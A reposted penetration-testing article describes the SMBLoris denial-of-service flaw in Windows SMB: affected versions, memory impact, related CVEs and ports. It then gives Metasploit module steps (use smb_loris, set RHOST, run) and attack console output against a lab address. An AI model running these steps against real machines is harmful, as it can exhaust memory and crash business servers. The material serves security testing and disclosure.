What is SMBLoris?
SMBLoris is a remote and uncredentialed denial of service attack against Microsoft® Windows® operating systems, caused by a 20+ year old vulnerability in the Server Message Block (SMB) network protocol implementation.
What versions of Windows are affected?
The vulnerability is in all modern versions of Windows, at least from Windows 2000 through Windows 10. Systems are still vulnerable even if all versions of SMB (1, 2, and 3) are disabled.
What is the threat?
It is computationally inexpensive for an attacker to cause large memory allocations and enormous amounts of wasted CPU cycles†, rendering vulnerable machines completely unusable, making business-critical services (such as web and mail servers) unavailable, and even causing the entire operating system to crash.
Scenario
Sockets
Attack Cost‡
Memory Impact
Baseline
1
4 bytes
128 KiB
Single IPv4
65,535
256 KiB
8 GiB
Single IPv6
65,535
256 KiB
8 GiB
Dual IPv4 / IPv6
131,070
512 KiB
16 GiB
10 IPs
655,535
2.5 MiB
80 GiB
† CPU impact cannot be meaningfully measured, but is generally quite significant.
‡ Attack cost is measured by how many bytes of TCP data an attacker must send over the network.
It does not include standard network headers, which are also small overhead for the attacker.
Is there a CVE?
SMBLoris has not (yet?) been assigned a CVE. Some similar vulnerabilities include:
CVE-2012-5568
MS09-048 (CVE-2009-1925 and CVE-2009-1926)
CVE-2008-4609
CVE-2007-6750
Is there a patch?
Not at this time.
What ports are affected?
Generally, SMB runs on port 445. The NetBIOS service on port 139 is probably also exploitable.
auxiliary/dos/smb/smb_lorris Metasploit Module
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See the SMBLoris page for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.
Verification Steps
Example steps in this format (is also in the PR):
Start msfconsole
Do: use auxiliary/dos/smb/smb_lorris
Do: set RHOST [IP]
Do: run
Target should allocate increasing amounts of memory.
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] 192.168.172.138:445 – Sending packet from Source Port: 1025
[*] 192.168.172.138:445 – Sending packet from Source Port: 1026
[*] 192.168.172.138:445 – Sending packet from Source Port: 1027
[*] 192.168.172.138:445 – Sending packet from Source Port: 1028
[*] 192.168.172.138:445 – Sending packet from Source Port: 1029
[*] 192.168.172.138:445 – Sending packet from Source Port: 1030
[*] 192.168.172.138:445 – Sending packet from Source Port: 1031
[*] 192.168.172.138:445 – Sending packet from Source Port: 1032
[*] 192.168.172.138:445 – Sending packet from Source Port: 1033
….
Source: Github
The post SMBLoris Denial of Service Metasploit Module appeared first on Penetration Testing.
http://ift.tt/2vtYlui http://ift.tt/2aM8QhC